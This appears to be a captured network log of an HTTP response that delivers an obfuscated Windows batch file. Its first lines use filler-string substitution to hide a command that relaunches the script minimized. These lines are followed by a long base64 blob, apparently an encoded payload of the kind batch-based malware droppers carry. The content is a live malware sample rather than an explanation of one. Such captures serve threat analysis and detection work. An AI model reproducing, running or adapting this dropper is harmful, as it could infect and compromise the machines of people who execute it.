Data received	Content-Length: 66832 Content-Type: application/octet-stream Connection:close @echo off set "JbUhLV=seBgrIot BgrIoTBgrIoxkJBgrIo=BgrIo1 BgrIo&&BgrIo stBgrIoarBgrIot BgrIo""BgrIo /BgrIomiBgrIon BgrIo" set "CTregK=&&BgrIo BgrIoeBgrIoxiBgrIotBgrIo" set "cYogot=notBgrIo BgrIodeBgrIofinBgrIoedBgrIo BgrIoTBgrIoxkJBgrIo if %cYogot:BgrIo=% (%JbUhLV:BgrIo=%%0 %CTregK:BgrIo=%) ::tkOZnOPbY7Nvcd92FR2B4AeKWaACXHx8ZX1Vk2X265/8qc+cn36MPymHvd3YWnzH1zG/+Jv5zWE05da5KZwsW6PfiG8au1bJ1DKJiFnzuedc/qoLxmbWDgwWBS54iEYQPEU1zQo2O1Ri2OWw/WYfH1r50dL5e1Bx4nrYmd9+yVXt3VsunWn5KL6Yjoj2DlwoKswvCmE09haF0j0s8B0QgUsa2E08Wy08LA+Ka2Cc+HyuZl+rzT3ObKIfEYvHoNOdcPSRuT594iKAofwvI4HJFq0KkBDjE1PYjX2dQlSGIHjn2nZLL6X1E16ySH1bjV71c3eYsAALZEpBzEf8l71fNNzapka5CHqiD1pQjn5tPYnopsP7rpRtVh0HV34D027h2wLnCSfVKVPKi/ImdiFNzZ+j9ip1QC4a+qlISsfp/Zp4+MLULKtp5H756UwC41E9d1KCa2iktHlQ23kBcE/Tpd0MtWsiADZPNFwVyRmkavwElhwbTJ5zX6rDrhaV4j1MxFXTbztXF2r2zznrtA/Nsm03l5FSoMEErFtUAZhsLdiZSal/SpvObmthm1iikgNN14uiDugjR17x/dZwtyNm+pCSs0zb6LNGF9aOnObok2Qm5XXvwUP7x8bPOazf2NsseupLSUpVKUqPuUg1MJD1IY/D8w75RksK6UdvhxqX0W5XjBR+VNOYShshRs//ExxUIhN1xRJuPiDM72JN9sXytVIJIX9UWS7fXkEnlSRC4Du6y8y6j/rGKKmTlxCFqNYEGcouUv+vKKh21lZjxyG0Sb7y5/UssuFJ8skOieacgWmLCGpi/F2lnQ2W3LK/4MjNDEMbFBv2oScpbN/3reZBb2xuuSSA2rgYp3YWEW1Hi2lxEOezgonimtDBP8Zjv9zWjlIuDd3cC2OuRCjBJCEdotnZrPRl4c7BrlO2aHn76zNulbXdjM7QDWLiO5C9Ry2ItiPYQWuhwu8fJRABeyhqaMdVzfCJfxjWxxAvDKEJHlMWeqxtEURgn9yOmcW1gWGiBwDZ+KoWdyGEjKxApCcxG4KKKEfDdFLHs4SfxRXBbwATVMi1vW0Zl4s4+Us+PE+SEKLw5Q5+beEBpXTuWJgRVFm87PMoWOZFO48fiW5e7pOSVtzPo1q1uXchl2nvZz9hNZAsmZocki5t3OQsY/xMnNTa8dTUZBetKtZE/cD/KALao0PFi3Wx33xHRWGmDVk5MW8O6wr+w4FDQ2rOtGIr2S0YFH3SqBtlQoSpczO96Je5ygNLcoYH53oV+W07SJCh727ZgcYb2v0EIjK/slkSO3lPcuLjfB0p4R+xTWe2DYT5uERPKrWTlxS8zNZ8oEUr2c5/YbxQLSEtzlwcPyYua+4+iMaJxZORVygMUZC6K4gCxLENIVdUfMsivljvyjxkIAI2cv5ol1BXCeuXpIWVGSfEG11/eYeCJI6nRYv7IJfI3t/MTkI8uNuq5aEo8ibjozWCTZL4rZ3PIHPCnsemzstwOwDMpRNyQwLg5HrBCq06vl+wC3Ebul0QN5qVzk8DU4V0/LHt+L06h1ZSOE4fvMtAZC8XqgpzfbDXrm+Mer0zwET5iLfdWYhciUWMrX2I3sD3UHO214vGfuwYg/LFaOCys9MoWDZ0UhNRwzvKZWqAmjdujoFcwgdgDZYXMFYmPZ5TdGz5t8hWqXxAKlRxFw0EBpLZbSYRWkLoLSgmmfQPms43h/UV7LmBGeGD7sO/smyAdXXRK3fpbSHUQZaZk
Data received	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
Data received	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
Data received	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
Data received	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
Data received	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
Data received	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
Data received	lpbc+HwEdX1mRJzCBfm0PoG8wW9zIKlijVuBNh/F8i1AcHnVK9ICvDw2BkqNrzmwNZcxp7zmoTGhABMlH1tRcF4cykWnpZK6xEb2T+mpFtMxtxMPDp9FcGzhU2F+BbgXz6ZQC7fBfglP7qPXvuMlMMYGvFX+oC4ae0/l47MZc4RV1a86VBXsXCo3CuFDmVCuh+6CI1XVR2tskFbBwpPGJbhuUDbHLgNNKU1VQrHLENLuBUhFQzwVQkR3BmdNQOick73iyUpz73Ts0jJnFgVePbuzSBuhHNEIDKrCRCGx4Pzt4VkJ04UA8OswNQoM/7Gw0DOHEQPaZ+OjrIUdaV5ExanP/YO4I5Ld1TgtfTGkznY6YUkmgeULWii0/+HoUIVClxJKXxYfhmGtLOCqJIgMB4gHtc9ks4OWXIRBGpFFye0XzSu+QWhh/GtGtss9JG+d8qnLYoehRWlyNr3GW1qt9YeqrGCvYhzjky5+PP7yTp3dnxR4bPzV+uZ8XZhTuibI0XMe2noO5qhR0qzIwvXXzh/kVuE/228uqmv6XltM16uSFCuhlf/SEqhLEiv5ktb858P05uYbrli5uwEMdN9EnyxLWBByjp8wChX3iZnbGUpoxspQUzddRhz7WkrJjTCnRN9rK8NtV0HRuSPxWas523hGQvJtfUU7wagpCAI39g/RqpPs2GeFErf4wvTOliEbVp84EKoJlSC+Vw9tgN/tSsFNywgX2jY5Ql5iL5AdWdIYyEMNS7LED8+WmlQO3fo8jFT++LWF2mD4oOEDQzxo3arn2eiojiCdgHCoiMTAuDcFJhnMqOQUv4pR/bDtBJT8M6UAen7kEcEzmWE6Kh4eXbRhaLh5CrhbIDTPwV55mP/Xpck3nSNhHd4tR/mLkowV30GbqHQlu1+bq6u+A4rba7nZ52nvdsiKRg4YRus0bqKyF+QU/FdDbe1dLI+rlaIgi+rDg1MhWPzuTEdUZ/WLdZqzBSz4wxZUa3kjax/H9kzXxl9td1vZNpQ5Cx/Xv6cKbhGwd7ib46dA+yy1RM0Tf+oXsvsS3jT5mEIACbCAqL4OzxDq/68Z37C51yK1R+AMcnHHMsG+8I3rg249LZ8MqRBZMw/NoLyx8bpvK5JaszDOc0HVwFK44wYkLLZhCe7iJed7Mve9jLu33YNT7Im7L3E6HGozGQqq00OTrsBz/tWMY/ceCvFeVUvj7bjvjHHVHYwdMT+uqxNdJLnlGApOhij8Kq92FmytxLMomx1AFkDrnjeRJg+1QO+Dfr+IuhyOacZtjDO9wf28fuYRh1xAHWjSiwJEz1ppOIWgCWevd7FNZS+uxGqVKHUyZMdEfv1n8CwF3O6Pz47+9MRqssv94pTIADBIRP8BNmQrR9gu5WNr5CLaHbkVH+gaLmKg0uv0hS9HaUFfY